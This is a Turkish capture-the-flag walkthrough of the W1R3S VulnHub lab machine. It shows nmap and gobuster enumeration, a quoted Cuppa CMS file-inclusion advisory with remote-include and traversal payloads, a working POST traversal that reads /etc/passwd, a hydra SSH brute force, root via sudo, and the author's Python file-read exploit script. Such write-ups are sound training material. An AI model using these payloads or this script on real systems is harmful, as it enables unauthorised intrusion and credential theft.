Makine Hakkında Bilgiler
Açıklama:
You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).
Difficulty to get a low privileged shell: Beginner/Intermediate
Difficulty to get privilege escalation: Beginner/Intermediate
About: This is a vulnerable Ubuntu box giving you somewhat of a real world scenario and reminds me of the OSCP labs.
If you need any hints, pointers or have questions feel free to email me: specterinthewires at gmail dot com
Virtual Machine: VMware Workstation
Vulnhub Sayfası:
https://www.vulnhub.com/entry/w1r3s-101,220/
İndirme Sayfası:
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
Walkthrough
Makineyi tespit ederek başlayalım.
┌──(root💀kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.2 00:50:56:f3:da:b0 VMware, Inc.
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.135 00:0c:29:6a:49:14 VMware, Inc.
192.168.6.254 00:50:56:e2:58:34 VMware, Inc.
35 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 4 responded
nmap taraması ile devam edelim.
[*] Scan: 187
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-10 21:33 EDT
Nmap scan report for W1R3S.inc (192.168.6.135)
Host is up (0.00044s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.6.132
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:6A:49:14 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.44 ms W1R3S.inc (192.168.6.135)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.85 seconds
ftp anonymous giriş vardı. Buradaki dosyaları aldım ancak pek bir yardımı olmadı.
┌──(root💀kali)-[~/oscp/w1r3s]
└─# ftp 192.168.6.135
Connected to 192.168.6.135.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.6.135:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> cd content
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 29 Jan 23 2018 01.txt
-rw-r--r-- 1 ftp ftp 165 Jan 23 2018 02.txt
-rw-r--r-- 1 ftp ftp 582 Jan 23 2018 03.txt
226 Directory send OK.
ftp> get 01.txt
local: 01.txt remote: 01.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for 01.txt (29 bytes).
226 Transfer complete.
29 bytes received in 0.00 secs (11.7903 kB/s)
ftp> get 02.txt
local: 02.txt remote: 02.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for 02.txt (165 bytes).
226 Transfer complete.
165 bytes received in 0.00 secs (69.5437 kB/s)
ftp> get 03.txt
local: 03.txt remote: 03.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for 03.txt (582 bytes).
226 Transfer complete.
582 bytes received in 0.00 secs (301.3570 kB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> cd docs
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 138 Jan 23 2018 worktodo.txt
226 Directory send OK.
ftp> get worktodo.txt
local: worktodo.txt remote: worktodo.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
226 Transfer complete.
138 bytes received in 0.00 secs (74.2101 kB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> cd new-employees
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 155 Jan 28 2018 employee-names.txt
226 Directory send OK.
ftp> get employee-names.txt
local: employee-names.txt remote: employee-names.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
226 Transfer complete.
155 bytes received in 0.00 secs (809.4502 kB/s)
ftp> exit
221 Goodbye.Aldığım dosyalardan bazı kullanıcılar çıkarmaya çalıştım daha sonrasında bunlarla ssh için bruteforce denedim ancak haşarılı olamadım.
┌──(root💀kali)-[~/oscp/w1r3s]
└─# ls
01.txt 02.txt 03.txt employee-names.txt worktodo.txt
┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat 01.txt
New FTP Server For W1R3S.inc
┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat 02.txt
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################
┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat 03.txt
___________.__ __ __ ______________________ _________ .__
\__ ___/| |__ ____ / \ / \/_ \______ \_____ \ / _____/ |__| ____ ____
| | | | \_/ __ \ \ \/\/ / | || _/ _(__ < \_____ \ | |/ \_/ ___\
| | | Y \ ___/ \ / | || | \/ \/ \ | | | \ \___
|____| |___| /\___ > \__/\ / |___||____|_ /______ /_______ / /\ |__|___| /\___ >
\/ \/ \/ \/ \/ \/ \/ \/ \/
┌──(root💀kali)-[~/oscp/w1r3s]
└─# ls
01.txt 02.txt 03.txt employee-names.txt worktodo.txt
┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat employee-names.txt
The W1R3S.inc employee list
Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources
┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat worktodo.txt
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡
....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
┌──(root💀kali)-[~/oscp/w1r3s]
└─# touch users
┌──(root💀kali)-[~/oscp/w1r3s]
└─# echo "naomi\nhector\njoseph\nalbert\ngina\nrico" >> users
┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat users
naomi
hector
joseph
albert
gina
rico- porta gittiğimde dizin keşfi yaptım ve çalışan bir uygulama gördüm.
┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# gobuster dir --url http://192.168.6.135 --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt --no-error | tee 1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.6.135
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,rar,7z,php,bak,txt,zip,sql,conf,php5,sh,bash,cap,pcap
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/07/10 18:38:47 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.135/icons/ (Status: 403) [Size: 294]
http://192.168.6.135/index.html (Status: 200) [Size: 11321]
http://192.168.6.135/javascript/ (Status: 403) [Size: 299]
http://192.168.6.135/administrator/ (Status: 200) [Size: 4322]
http://192.168.6.135/server-status/ (Status: 403) [Size: 302]
Progress: 2758095 / 19107510 (14.43%) ^C
┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# gobuster dir --url http://192.168.6.135/administrator --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt --no-error | tee 2
┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# gobuster dir --url http://192.168.6.135/administrator --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt --no-error | tee 2
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.6.135/administrator
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: zip,7z,conf,bash,bak,php,html,sql,txt,rar,php5,sh,cap,pcap
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/07/10 18:45:38 Starting gobuster in directory enumeration mode
===============================================================
http://192.168.6.135/administrator/media/ (Status: 200) [Size: 2624]
http://192.168.6.135/administrator/templates/ (Status: 200) [Size: 31]
http://192.168.6.135/administrator/index.php (Status: 200) [Size: 4322]
http://192.168.6.135/administrator/alerts/ (Status: 200) [Size: 31]
http://192.168.6.135/administrator/language/ (Status: 200) [Size: 1160]
http://192.168.6.135/administrator/js/ (Status: 200) [Size: 31]
http://192.168.6.135/administrator/components/ (Status: 200) [Size: 31]
http://192.168.6.135/administrator/api/ (Status: 200) [Size: 62]
http://192.168.6.135/administrator/classes/ (Status: 200) [Size: 31]
http://192.168.6.135/administrator/extensions/ (Status: 200) [Size: 31]
http://192.168.6.135/administrator/robots.txt (Status: 200) [Size: 26]
http://192.168.6.135/administrator/installation/ (Status: 200) [Size: 4322]
http://192.168.6.135/administrator/Configuration.php (Status: 200) [Size: 0]
C
┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# 130 ⨯
Çalışan uygulamay ait exploit db'de yazılmış bir yazı vardı.
┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# searchsploit cuppa cms
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~/oscp/w1r3s/gobuster]
└─# cd ..
┌──(root💀kali)-[~/oscp/w1r3s]
└─# cp $(locate php/webapps/25971.txt) .
┌──(root💀kali)-[~/oscp/w1r3s]
└─# cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################################
VULNERABILITY: PHP CODE INJECTION
####################################
/alerts/alertConfigField.php (LINE: 22)
-----------------------------------------------------------------------------
LINE 22:
<
-----------------------------------------------------------------------------
#####################################################
DESCRIPTION
#####################################################
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
#####################################################
EXPLOIT
#####################################################
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Moreover, We could access Configuration.php source code via PHPStream
For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------
Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------
Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------
Able to read sensitive information via File Inclusion (PHP Stream)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################ Sıkıntılı nokta şu, buradaki exploiti açıklamaya uygun bir şekilde denediğimde kullanamadım. Get isteği yapmamız bekleniyor. Ancak POST isteği ile manipüle edebiliyoruz. Gönderdiğim post isteği aşağıda verilmiştir.
POST /administrator/alerts/alertConfigField.php HTTP/1.1
Host: 192.168.6.135
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
urlConfig=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64HTTP/1.1 200 OK
Date: Sun, 11 Jul 2021 00:32:58 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: country=us; path=/
Set-Cookie: language=en; path=/
Set-Cookie: PHPSESSID=tl8pvlp28e5niha6si2nvrlu57; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4347
Content-Type: text/html; charset=UTF-8
<style>
.new_content{
position: fixed;
}
.alert_config_field{
font-size:12px;
background:#FFF;
position:relative;
border-radius: 3px;
box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
overflow:hidden;
position:fixed;
top:50%;
left:50%;
width:600px;
height:440px;
margin-left:-300px;
margin-top:-220px;
}
.alert_config_top{
position: relative;
margin: 2px;
margin-bottom: 0px;
border: 1px solid #D2D2D2;
background: #4489F8;
overflow: auto;
color:#FFF;
font-size: 13px;
padding: 7px 5px;
box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
}
.description_alert{
position:relative;
font-size:12px;
text-shadow:0 1px #FFFFFF;
font-weight: normal;
padding: 5px 0px 5px 0px;
}
.btnClose_alert{
position:absolute;
top: 4px; right: 2px;
width:22px;
height:22px;
cursor:pointer;
background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
background-position: center;
background-size: 13px;
}
.content_alert_config{
position:relative;
clear:both;
margin: 2px;
margin-top: 0px;
height: 401px;
padding: 10px;
overflow: auto;
}
</style>
<script>
function CloseDefaultAlert(){
cuppa.setContent({'load':false, duration:0.2});
cuppa.blockade({'load':false, duration:0.2, delay:0.1});
}
</script>
<div class="alert_config_field" id="alert">
<div class="alert_config_top">
<strong>Configuration</strong>: <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
</div>
<div id="content_alert_config" class="content_alert_config">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
</div>
</div>Gelen cevapta başarılı bir şekilde w1r3s kullanıcısını elde edebiliyoruz. İşleri daha kolay halletmek için bunun python kodunu yazıdm ve exploit db'ye gönderdim.
Daha sonrasında hydra ile tekrar bir saldırı düzenledim.
┌──(root💀kali)-[~/oscp/w1r3s]
└─# hydra -L users -P /usr/share/wordlists/rockyou.txt ssh://192.168.6.135
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-10 20:01:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.6.135:22/
[22][ssh] host: 192.168.6.135 login: w1r3s password: computer
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-10 20:02:32
Artık içeri girebiliriz.
└─# ssh [email protected]
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
[email protected]'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
644 packages can be updated.
490 updates are security updates.
New release '18.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
.....You made it huh?....
Last login: Sat Jul 10 17:41:48 2021 from 192.168.6.132
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
w1r3s@W1R3S:~$ sudo su
[sudo] password for w1r3s:
root@W1R3S:/home/w1r3s# cd /root
root@W1R3S:~# ls
flag.txt
root@W1R3S:~# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
----------------------------------------------------------------------------------------
root@W1R3S:~#
kullanıcı sudo grubunda 🙂
Not: Yazdığım exploit aşağıda verilmiştir.
┌──(root💀kali)-[~]
└─# cat Cuppa_CMS_File_Inclusion.py
import requests
import urllib.parse
from bs4 import BeautifulSoup
def exploit(url):
while(1):
url = url + "alerts/alertConfigField.php"
path = input("[*] Enter the full path of the file you want to read.\r\n>> ")
data = {'urlConfig': '../'*10+path}
headers = {'Content-type': 'application/x-www-form-urlencoded'}
print("[*] Your payload:", urllib.parse.urlencode(data))
r = requests.post(url, headers=headers, data=data)
html_doc = r.text
soup = BeautifulSoup(html_doc, 'html.parser')
print(soup.find(id="content_alert_config").text)
def main():
ip = input("[*] Enter the target ip adress.\r\n>> ")
list = "1. http://{0}/\r\n2. http://{0}/administator/\r\n3. http://{0}/cuppa/\r\n4. Other".format(ip)
host = int(input("[*] The target address is similar to which of the following?\r\n{0}\r\n>> ".format(list)))
switcher = {
1: "http://{0}/".format(ip),
2: "http://{0}/administrator/".format(ip),
3: "http://{0}/cuppa/".format(ip)
}
if(host<4 and host>0):
exploit(switcher.get(host))
elif(host == 4):
exploit(input("[*] Enter the URL\r\n>> "))
else:
print("[*] Incorrect operation")
exit()
main()
"""
┌──(root💀kali)-[~]
└─# python3 Cuppa_CMS_File_Inclusion.py
[*] Enter the target ip adress.
>> 192.168.6.135
[*] The target address is similar to which of the following?
1. http://192.168.6.135/
2. http://192.168.6.135/administator/
3. http://192.168.6.135/cuppa/
4. Other
>> 2
[*] Enter the full path of the file you want to read.
>> /etc/passwd
[*] Your payload: urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
